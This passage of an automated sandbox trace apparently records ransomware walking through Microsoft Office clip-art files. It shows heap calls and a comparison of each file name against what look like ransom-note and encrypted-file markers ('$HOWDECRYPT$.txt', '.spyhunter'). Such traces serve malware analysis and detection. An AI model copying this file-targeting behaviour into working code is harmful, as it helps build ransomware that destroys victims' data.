RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2af8) returned 0x2c249b0 [0098.451] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.452] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 67 [0098.452] StrStrIW (lpFirst="J0183198.WMF", lpSrch=".spyhunter") returned 0x0 [0098.452] lstrcmpW (lpString1="J0183198.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.452] lstrcmpW (lpString1="J0183198.WMF", lpString2="_uninstalling_.png") returned 1 [0098.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183198.WMF") returned 67 [0098.452] GetProcessHeap () returned 0x2c0000 [0098.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c498 [0098.452] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b00) returned 0x2c249b0 [0098.452] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.452] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 67 [0098.452] StrStrIW (lpFirst="J0183574.WMF", lpSrch=".spyhunter") returned 0x0 [0098.452] lstrcmpW (lpString1="J0183574.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.452] lstrcmpW (lpString1="J0183574.WMF", lpString2="_uninstalling_.png") returned 1 [0098.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183574.WMF") returned 67 [0098.452] GetProcessHeap () returned 0x2c0000 [0098.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c568 [0098.452] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b08) returned 0x2c249b0 [0098.452] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.452] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 67 [0098.453] StrStrIW (lpFirst="J0185670.WMF", lpSrch=".spyhunter") returned 0x0 [0098.453] lstrcmpW (lpString1="J0185670.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.453] lstrcmpW (lpString1="J0185670.WMF", lpString2="_uninstalling_.png") returned 1 [0098.453] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 67 [0098.453] GetProcessHeap () returned 0x2c0000 [0098.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c638 [0098.453] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b10) returned 0x2c249b0 [0098.453] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.497] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 67 [0098.497] StrStrIW (lpFirst="J0185774.WMF", lpSrch=".spyhunter") returned 0x0 [0098.497] lstrcmpW (lpString1="J0185774.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.497] lstrcmpW (lpString1="J0185774.WMF", lpString2="_uninstalling_.png") returned 1 [0098.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185774.WMF") returned 67 [0098.498] GetProcessHeap () returned 0x2c0000 [0098.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1fb80 [0098.498] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b08) returned 0x2c249b0 [0098.498] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.498] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 67 [0098.498] StrStrIW (lpFirst="J0185776.WMF", lpSrch=".spyhunter") returned 0x0 [0098.498] lstrcmpW (lpString1="J0185776.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.498] lstrcmpW (lpString1="J0185776.WMF", lpString2="_uninstalling_.png") returned 1 [0098.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 67 [0098.498] GetProcessHeap () returned 0x2c0000 [0098.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ac38 [0098.498] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b10) returned 0x2c249b0 [0098.498] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.498] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 67 [0098.498] StrStrIW (lpFirst="J0185778.WMF", lpSrch=".spyhunter") returned 0x0 [0098.498] lstrcmpW (lpString1="J0185778.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.498] lstrcmpW (lpString1="J0185778.WMF", lpString2="_uninstalling_.png") returned 1 [0098.498] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185778.WMF") returned 67 [0098.498] GetProcessHeap () returned 0x2c0000 [0098.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c708 [0098.498] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b18) returned 0x2c249b0 [0098.499] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.499] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 67 [0098.499] StrStrIW (lpFirst="J0185780.WMF", lpSrch=".spyhunter") returned 0x0 [0098.499] lstrcmpW (lpString1="J0185780.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.499] lstrcmpW (lpString1="J0185780.WMF", lpString2="_uninstalling_.png") returned 1 [0098.499] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 67 [0098.499] GetProcessHeap () returned 0x2c0000 [0098.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c7d8 [0098.499] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b20) returned 0x2c249b0 [0098.499] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.499] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 67 [0098.499] StrStrIW (lpFirst="J0185786.WMF", lpSrch=".spyhunter") returned 0x0 [0098.499] lstrcmpW (lpString1="J0185786.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.499] lstrcmpW (lpString1="J0185786.WMF", lpString2="_uninstalling_.png") returned 1 [0098.499] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 67 [0098.499] GetProcessHeap () returned 0x2c0000 [0098.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c8a8 [0098.499] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b28) returned 0x2c249b0 [0098.499] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.499] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 67 [0098.500] StrStrIW (lpFirst="J0185790.WMF", lpSrch=".spyhunter") returned 0x0 [0098.500] lstrcmpW (lpString1="J0185790.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.500] lstrcmpW (lpString1="J0185790.WMF", lpString2="_uninstalling_.png") returned 1 [0098.500] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned 67 [0098.500] GetProcessHeap () returned 0x2c0000 [0098.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c978 [0098.500] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b30) returned 0x2c249b0 [0098.500] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.500] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 67 [0098.500] StrStrIW (lpFirst="J0185796.WMF", lpSrch=".spyhunter") returned 0x0 [0098.500] lstrcmpW (lpString1="J0185796.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.500] lstrcmpW (lpString1="J0185796.WMF", lpString2="_uninstalling_.png") returned 1 [0098.500] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 67 [0098.500] GetProcessHeap () returned 0x2c0000 [0098.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ca48 [0098.500] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b38) returned 0x2c249b0 [0098.500] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.500] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 67 [0098.501] StrStrIW (lpFirst="J0185798.WMF", lpSrch=".spyhunter") returned 0x0 [0098.501] lstrcmpW (lpString1="J0185798.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.501] lstrcmpW (lpString1="J0185798.WMF", lpString2="_uninstalling_.png") returned 1 [0098.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185798.WMF") returned 67 [0098.501] GetProcessHeap () returned 0x2c0000 [0098.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2cb18 [0098.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b40) returned 0x2c249b0 [0098.501] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.501] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 67 [0098.501] StrStrIW (lpFirst="J0185800.WMF", lpSrch=".spyhunter") returned 0x0 [0098.501] lstrcmpW (lpString1="J0185800.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.501] lstrcmpW (lpString1="J0185800.WMF", lpString2="_uninstalling_.png") returned 1 [0098.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 67 [0098.501] GetProcessHeap () returned 0x2c0000 [0098.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2cbe8 [0098.501] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b48) returned 0x2c249b0 [0098.501] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.501] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 67 [0098.501] StrStrIW (lpFirst="J0185806.WMF", lpSrch=".spyhunter") returned 0x0 [0098.502] lstrcmpW (lpString1="J0185806.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.502] lstrcmpW (lpString1="J0185806.WMF", lpString2="_uninstalling_.png") returned 1 [0098.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 67 [0098.502] GetProcessHeap () returned 0x2c0000 [0098.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ccb8 [0098.502] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b50) returned 0x2c249b0 [0098.502] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.502] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 67 [0098.502] StrStrIW (lpFirst="J0185818.WMF", lpSrch=".spyhunter") returned 0x0 [0098.502] lstrcmpW (lpString1="J0185818.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.502] lstrcmpW (lpString1="J0185818.WMF", lpString2="_uninstalling_.png") returned 1 [0098.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 67 [0098.502] GetProcessHeap () returned 0x2c0000 [0098.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2cd88 [0098.502] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b58) returned 0x2c249b0 [0098.502] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.502] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 67 [0098.502] StrStrIW (lpFirst="J0185828.WMF", lpSrch=".spyhunter") returned 0x0 [0098.503] lstrcmpW (lpString1="J0185828.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.503] lstrcmpW (lpString1="J0185828.WMF", lpString2="_uninstalling_.png") returned 1 [0098.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF") returned 67 [0098.503] GetProcessHeap () returned 0x2c0000 [0098.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ce58 [0098.503] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b60) returned 0x2c249b0 [0098.503] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.503] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 67 [0098.503] StrStrIW (lpFirst="J0185834.WMF", lpSrch=".spyhunter") returned 0x0 [0098.503] lstrcmpW (lpString1="J0185834.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.503] lstrcmpW (lpString1="J0185834.WMF", lpString2="_uninstalling_.png") returned 1 [0098.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185834.WMF") returned 67 [0098.503] GetProcessHeap () returned 0x2c0000 [0098.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2cf28 [0098.503] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b68) returned 0x2c249b0 [0098.503] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.503] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 67 [0098.503] StrStrIW (lpFirst="J0185842.WMF", lpSrch=".spyhunter") returned 0x0 [0098.503] lstrcmpW (lpString1="J0185842.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.504] lstrcmpW (lpString1="J0185842.WMF", lpString2="_uninstalling_.png") returned 1 [0098.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185842.WMF") returned 67 [0098.504] GetProcessHeap () returned 0x2c0000 [0098.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2cff8 [0098.504] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b70) returned 0x2c249b0 [0098.504] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.504] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF") returned 67 [0098.504] StrStrIW (lpFirst="J0186346.WMF", lpSrch=".spyhunter") returned 0x0 [0098.504] lstrcmpW (lpString1="J0186346.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.504] lstrcmpW (lpString1="J0186346.WMF", lpString2="_uninstalling_.png") returned 1 [0098.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186346.WMF") returned 67 [0098.504] GetProcessHeap () returned 0x2c0000 [0098.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d0c8 [0098.504] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b78) returned 0x2c249b0 [0098.504] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.504] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 67 [0098.504] StrStrIW (lpFirst="J0186360.WMF", lpSrch=".spyhunter") returned 0x0 [0098.504] lstrcmpW (lpString1="J0186360.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.505] lstrcmpW (lpString1="J0186360.WMF", lpString2="_uninstalling_.png") returned 1 [0098.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 67 [0098.505] GetProcessHeap () returned 0x2c0000 [0098.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d198 [0098.505] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b80) returned 0x2c249b0 [0098.505] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.505] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 67 [0098.505] StrStrIW (lpFirst="J0186362.WMF", lpSrch=".spyhunter") returned 0x0 [0098.505] lstrcmpW (lpString1="J0186362.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.505] lstrcmpW (lpString1="J0186362.WMF", lpString2="_uninstalling_.png") returned 1 [0098.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186362.WMF") returned 67 [0098.505] GetProcessHeap () returned 0x2c0000 [0098.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d268 [0098.505] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b88) returned 0x2c249b0 [0098.505] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.505] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF") returned 67 [0098.505] StrStrIW (lpFirst="J0186364.WMF", lpSrch=".spyhunter") returned 0x0 [0098.505] lstrcmpW (lpString1="J0186364.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.505] lstrcmpW (lpString1="J0186364.WMF", lpString2="_uninstalling_.png") returned 1 [0098.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF") returned 67 [0098.506] GetProcessHeap () returned 0x2c0000 [0098.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d338 [0098.506] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b90) returned 0x2c249b0 [0098.506] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.506] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF") returned 67 [0098.506] StrStrIW (lpFirst="J0187647.WMF", lpSrch=".spyhunter") returned 0x0 [0098.506] lstrcmpW (lpString1="J0187647.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.506] lstrcmpW (lpString1="J0187647.WMF", lpString2="_uninstalling_.png") returned 1 [0098.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF") returned 67 [0098.506] GetProcessHeap () returned 0x2c0000 [0098.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d408 [0098.506] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2b98) returned 0x2c249b0 [0098.506] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.506] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF") returned 67 [0098.506] StrStrIW (lpFirst="J0187815.WMF", lpSrch=".spyhunter") returned 0x0 [0098.506] lstrcmpW (lpString1="J0187815.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.506] lstrcmpW (lpString1="J0187815.WMF", lpString2="_uninstalling_.png") returned 1 [0098.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF") returned 67 [0098.507] GetProcessHeap () returned 0x2c0000 [0098.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d4d8 [0098.507] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ba0) returned 0x2c249b0 [0098.507] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.507] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF") returned 67 [0098.507] StrStrIW (lpFirst="J0187817.WMF", lpSrch=".spyhunter") returned 0x0 [0098.507] lstrcmpW (lpString1="J0187817.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.507] lstrcmpW (lpString1="J0187817.WMF", lpString2="_uninstalling_.png") returned 1 [0098.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187817.WMF") returned 67 [0098.507] GetProcessHeap () returned 0x2c0000 [0098.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d5a8 [0098.507] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ba8) returned 0x2c249b0 [0098.507] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.507] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF") returned 67 [0098.507] StrStrIW (lpFirst="J0187819.WMF", lpSrch=".spyhunter") returned 0x0 [0098.507] lstrcmpW (lpString1="J0187819.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.507] lstrcmpW (lpString1="J0187819.WMF", lpString2="_uninstalling_.png") returned 1 [0098.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187819.WMF") returned 67 [0098.508] GetProcessHeap () returned 0x2c0000 [0098.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d678 [0098.508] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bb0) returned 0x2c249b0 [0098.508] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.508] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF") returned 67 [0098.508] StrStrIW (lpFirst="J0187825.WMF", lpSrch=".spyhunter") returned 0x0 [0098.508] lstrcmpW (lpString1="J0187825.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.508] lstrcmpW (lpString1="J0187825.WMF", lpString2="_uninstalling_.png") returned 1 [0098.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187825.WMF") returned 67 [0098.508] GetProcessHeap () returned 0x2c0000 [0098.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d748 [0098.508] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bb8) returned 0x2c249b0 [0098.508] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.508] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF") returned 67 [0098.508] StrStrIW (lpFirst="J0187829.WMF", lpSrch=".spyhunter") returned 0x0 [0098.508] lstrcmpW (lpString1="J0187829.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.509] lstrcmpW (lpString1="J0187829.WMF", lpString2="_uninstalling_.png") returned 1 [0098.509] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187829.WMF") returned 67 [0098.509] GetProcessHeap () returned 0x2c0000 [0098.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2d818 [0098.509] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2bc0) returned 0x2c249b0 